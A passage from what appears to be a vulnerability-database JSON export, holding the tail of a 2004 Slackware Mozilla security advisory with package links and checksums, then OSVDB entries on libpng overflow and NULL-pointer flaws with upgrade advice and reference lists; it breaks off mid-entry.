Mozilla 1.7.2. This\n fixes three security vulnerabilities. For details, see:\n http://www.mozilla.org/projects/security/known-vulnerabilities.html#mozilla1.7.2\n (* Security fix *)\npatches/packages/mozilla-plugins-1.7.2-noarch-1.tgz: Changed plugin symlinks\n for Mozilla 1.7.2.\n\nWhere to find the new packages:\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mozilla-1.4.3-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mozilla-plugins-1.4.3-noarch-1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mozilla-1.7.2-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mozilla-plugins-1.7.2-noarch-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/epiphany-1.2.7-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/gaim-0.81-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/galeon-1.3.17-i486-1.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-1.7.2-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-plugins-1.7.2-noarch-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/gnome/epiphany-1.2.7-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/gnome/galeon-1.3.17-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/gaim-0.81-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.1 packages:\n29515193166b9b618be405a71b5e9a59 mozilla-1.4.3-i486-1.tgz\n49d537be814de72a3d62a5cc9f6e3b15 mozilla-plugins-1.4.3-noarch-1.tgz\n\nSlackware 10.0 packages:\n612a65758f03fe08a44e004b1ae92d70 mozilla-1.7.2-i486-1.tgz\n55da20d3c7acdd50a3b4abfe12191069 mozilla-plugins-1.7.2-noarch-1.tgz\n86034039fbf6b52584e05701a0598ca4 
epiphany-1.2.7-i486-1.tgz\nc3f238fdba8684948d8817d7cf0db567 gaim-0.81-i486-1.tgz\n0e8393b8f1b992dc7804fe925a839755 galeon-1.3.17-i486-1.tgz\n\nSlackware -current packages:\n612a65758f03fe08a44e004b1ae92d70 mozilla-1.7.2-i486-1.tgz\n55da20d3c7acdd50a3b4abfe12191069 mozilla-plugins-1.7.2-noarch-1.tgz\n86034039fbf6b52584e05701a0598ca4 epiphany-1.2.7-i486-1.tgz\n0e8393b8f1b992dc7804fe925a839755 galeon-1.3.17-i486-1.tgz\nddb7281b985c6b7efb20afc69e5c2ffb gaim-0.81-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg mozilla-1.7.2-i486-1.tgz \\\n mozilla-plugins-1.7.2-noarch-1.tgz \\\n epiphany-1.2.7-i486-1.tgz \\\n gaim-0.81-i486-1.tgz \\\n galeon-1.3.17-i486-1.tgz", "modified": "2004-08-10T21:17:12", "published": "2004-08-10T21:17:12", "id": "SSA-2004-223-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.667659", "type": "slackware", "title": "[slackware-security] Mozilla", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_handle_iCCP fails to validate the input length from PNG files resulting in a possible NULL-pointer being referenced. With a specially crafted request, an attacker can cause denial of service which might result in a loss of availability for the application.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. 
The library function png_handle_iCCP fails to validate the input length from PNG files resulting in a possible NULL-pointer being referenced. With a specially crafted request, an attacker can cause denial of service which might result in a loss of availability for the application.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory 
ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: 
http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMicrosoft Security Bulletin: MS05-009\nMicrosoft Knowledge Base Article: 890261\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0034.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\nISS X-Force ID: 19252\n[CVE-2004-0597](https://vulners.com/cve/CVE-2004-0597)\n[CVE-2004-0598](https://vulners.com/cve/CVE-2004-0598)\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 236656\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8313", "id": "OSVDB:8313", "type": "osvdb", "title": "libpng png_handle_iCCP() NULL Pointer Dereference DoS", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_handle_sPLT fails to validate input resulting in a possible integer overflow. With a specially crafted request, an attacker might theoretically cause execution of code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. 
Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_handle_sPLT fails to validate input resulting in a possible integer overflow. With a specially crafted request, an attacker might theoretically cause execution of code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory 
ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat RHSA: RHSA-2004:421-17\nOther Advisory URL: 
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 477512\nCERT VU: 160448\nCERT VU: 286464\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8314", "id": "OSVDB:8314", "type": "osvdb", "title": "libpng png_handle_sPLT Local Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599"], "edition": 1, "description": "## Vulnerability Description\nA potential local integer overflow exists in libpng. The library function png_push_read_chunk contains code that might be susceptible to integer overflows. It is currently unknown how dangerous this code might be. With a specially crafted request, an attacker might cause crashes or execution of code resulting in a loss of availability.\n## Technical Description\nAccording to the vulnerability discoverer, the severity of this issue is unknown. Might be difficult to exploit, if at all.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. 
Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA potential local integer overflow exists in libpng. The library function png_push_read_chunk contains code that might be susceptible to integer overflows. It is currently unknown how dangerous this code might be. With a specially crafted request, an attacker might cause crashes or execution of code resulting in a loss of availability.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory 
ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8315](https://vulners.com/osvdb/OSVDB:8315)\nRedHat RHSA: RHSA-2004:402-08\nRedHat 
RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://scary.beasts.org/security/CESA-2004-001.txt\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 477512\nCERT VU: 160448\nCERT VU: 286464\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8316", "id": "OSVDB:8316", "type": "osvdb", "title": "libpng Progressive Display Image Reading Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0599"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_read_png fails to validate the height of input PNG files resulting in a possible integer overflow. With a specially crafted request, an attacker might cause a crash of the application resulting in a loss of availability.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. 
Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_read_png fails to validate the height of input PNG files resulting in a possible integer overflow. With a specially crafted request, an attacker might cause a crash of the application resulting in a loss of availability.\n## References:\nVendor URL: http://www.imagemagick.org/\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory 
ID:12810](https://secuniaresearch.flexerasoftware.com/advisories/12810/)\n[Secunia Advisory ID:13341](https://secuniaresearch.flexerasoftware.com/advisories/13341/)\n[Secunia Advisory ID:22958](https://secuniaresearch.flexerasoftware.com/advisories/22958/)\n[Secunia Advisory ID:12221](https://secuniaresearch.flexerasoftware.com/advisories/12221/)\n[Secunia Advisory ID:12219](https://secuniaresearch.flexerasoftware.com/advisories/12219/)\n[Secunia Advisory ID:12223](https://secuniaresearch.flexerasoftware.com/advisories/12223/)\n[Secunia Advisory ID:12232](https://secuniaresearch.flexerasoftware.com/advisories/12232/)\n[Secunia Advisory ID:12240](https://secuniaresearch.flexerasoftware.com/advisories/12240/)\n[Secunia Advisory ID:12248](https://secuniaresearch.flexerasoftware.com/advisories/12248/)\n[Secunia Advisory ID:15432](https://secuniaresearch.flexerasoftware.com/advisories/15432/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:22957](https://secuniaresearch.flexerasoftware.com/advisories/22957/)\n[Secunia Advisory ID:12220](https://secuniaresearch.flexerasoftware.com/advisories/12220/)\n[Secunia Advisory ID:12234](https://secuniaresearch.flexerasoftware.com/advisories/12234/)\n[Secunia Advisory ID:12249](https://secuniaresearch.flexerasoftware.com/advisories/12249/)\n[Secunia Advisory ID:12283](https://secuniaresearch.flexerasoftware.com/advisories/12283/)\n[Secunia Advisory ID:12354](https://secuniaresearch.flexerasoftware.com/advisories/12354/)\n[Secunia Advisory ID:13291](https://secuniaresearch.flexerasoftware.com/advisories/13291/)\n[Related OSVDB ID: 8313](https://vulners.com/osvdb/OSVDB:8313)\n[Related OSVDB ID: 8326](https://vulners.com/osvdb/OSVDB:8326)\n[Related OSVDB ID: 8312](https://vulners.com/osvdb/OSVDB:8312)\n[Related OSVDB ID: 8314](https://vulners.com/osvdb/OSVDB:8314)\n[Related OSVDB ID: 8316](https://vulners.com/osvdb/OSVDB:8316)\nRedHat RHSA: RHSA-2004:402-08\nRedHat 
RHSA: RHSA-2004:421-17\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:082\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200408-22.xml\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBTU01063\nOther Advisory URL: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57617\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-57683-1\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.25/SCOSA-2005.25.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2004.16/SCOSA-2004.16.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0026.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 10925\n[CVE-2004-0599](https://vulners.com/cve/CVE-2004-0599)\nCIAC Advisory: o-192\nCERT VU: 477512\nCERT VU: 388984\nCERT VU: 160448\n", "modified": "2004-08-04T00:00:00", "published": "2004-08-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8315", "id": "OSVDB:8315", "type": "osvdb", "title": "libpng png_read_png Integer Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2004-0597"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in libpng. The library function png_handle_sBIT relies on checks in other functions to perform input validation resulting in a possible buffer overflow. With a specially crafted PNG file, an attacker might cause execution of code resulting in a loss of integrity.\n## Technical Description\nAccording to the vulnerability discoverer, this issue is extremely difficult to exploit, if at all.\n## Solution Description\nUpgrade to version 1.2.6 release candidate 1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. 
Users of the older 1.0 series should upgrade to libpng-1.0.16 release candidate 1 or higher.\n## Short Description\nA local overflow exists in libpng. The library function png_handle_sBIT relies on checks in other functions to perform input validation resulting in a possible buffer overflow. With a specially crafted PNG file, an attacker might cause execution of code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.imagemagick.org/\nVendor URL: http://www.libpng.org/pub/png/libpng.html\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=61798)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:213)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_23_libpng.html)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:079)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00006.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000564)\n[Vendor Specific Advisory URL](http://bugzilla.mozilla.org/show_bug.cgi?id=251381)\n[Vendor Specific Advisory URL](http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00139.html)\n[Vendor Specific Advisory URL](http://www.redhat.com/archives/fedora-announce-list/2004-August/msg00005.html)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200408-03.xml)\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:212)\nUS-CERT Cyber Security Alert: TA04-217A\nSecurity Tracker: 1010854\n[Secunia Advisory ID:12222](https://secuniaresearch.flexerasoftware.com/advisories/12222/)\n[Secunia Advisory 
